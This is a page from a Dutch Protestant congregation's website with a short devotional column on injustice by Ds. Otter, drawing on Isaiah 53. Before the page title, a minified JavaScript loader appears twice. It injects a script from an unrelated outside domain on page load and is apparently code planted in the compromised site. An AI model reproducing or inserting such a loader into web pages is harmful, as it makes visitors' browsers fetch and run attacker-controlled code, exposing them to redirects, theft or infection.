;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Onrecht - PKN Damwâld

Onrecht

Gepubliceerd op: vrijdag 28 oktober 2022

Op verschillende plekken kan je onder onrecht lijden: Het onrecht in de Oekraïne levert veel onschuldige slachtoffers. In Nigeria worden christenen onderdrukt en gediscrimineerd. En dichtbij ervaren heel wat boeren de stikstofmaatregelen als onrecht.

Onrecht geeft een gevoel van machteloosheid of juist van strijdlust. Voor je het weet groeit de bitterheid en rancune in je hart. Here help ons.

In Jesaja 53 profeteert Jesaja over de Messias. Hij werd veracht en hoewel Hij onschuldig was droeg Hij onze ongerechtigheden. Toch bracht Hij door al het onrecht heen Gods kostbare erfenis: “ de straf die ons de vrede aanbrengt was op Hem en door Zijn striemen is ons genezing geworden” (v.5). God kan kennelijk door onrecht heen Zijn recht laten groeien. Het leed van Jezus is wel anders dan wat we om ons heen zien, toch maakt de Here duidelijk dat Zijn plannen door onrecht niet gehinderd worden. Gelukkig.

Here bouw Uw Koninkrijk van rechtvaardigheid, vrede en blijdschap (Rom.14,17) in deze wereld. Zet ons in als bouwers van Uw wijngaard.

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns